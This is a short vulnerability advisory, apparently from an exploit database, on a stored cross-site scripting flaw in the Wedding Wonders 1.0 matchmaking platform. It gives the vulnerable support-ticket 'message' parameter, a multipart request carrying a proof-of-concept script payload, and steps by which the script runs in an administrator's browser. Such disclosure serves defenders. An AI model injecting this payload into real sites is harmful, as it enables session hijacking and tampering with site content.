Wedding Wonders 1.0 Cross Site Scripting

2023.07.18
Credit: CraCkEr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Wedding Wonders 1.0 - Stored XSS # Exploit Author: CraCkEr # Date: 13/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://bugfinder.net/product/wedding-wonders-a-matrimonial-and-matchmaking-platform/17 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Description Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Path: /weeding-wonders/user/ticket/create POST parameter 'message' is vulnerable to XSS ----------------------------------------------------------- POST /weeding-wonders/user/ticket/create HTTP/2 Content-Disposition: form-data; name="subject" Anything ----------------------------------------------------------- Content-Disposition: form-data; name="message" <script>alert(1)</script> ----------------------------------------------------------- ## Steps to Reproduce: 1. Login as a (Normal User) 2. Go to [My Profile] on this Path: https://website/weeding-wonders/user/profile 3. Click on [Support Ticket] on this Path: https://website/weeding-wonders/user/ticket 4. Click on [Create Ticket] 5. Enter Any Subject 6. Inject your XSS Payload in [Message Box] 7. Click on [Submit] 8. When ADMIN visit [SUPPORT TICKETS] on this Path: https://website/weeding-wonders/admin/tickets and Open the [New Pending Ticket] 9. XSS Will Fire and Executed on his Browser [-] Done


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top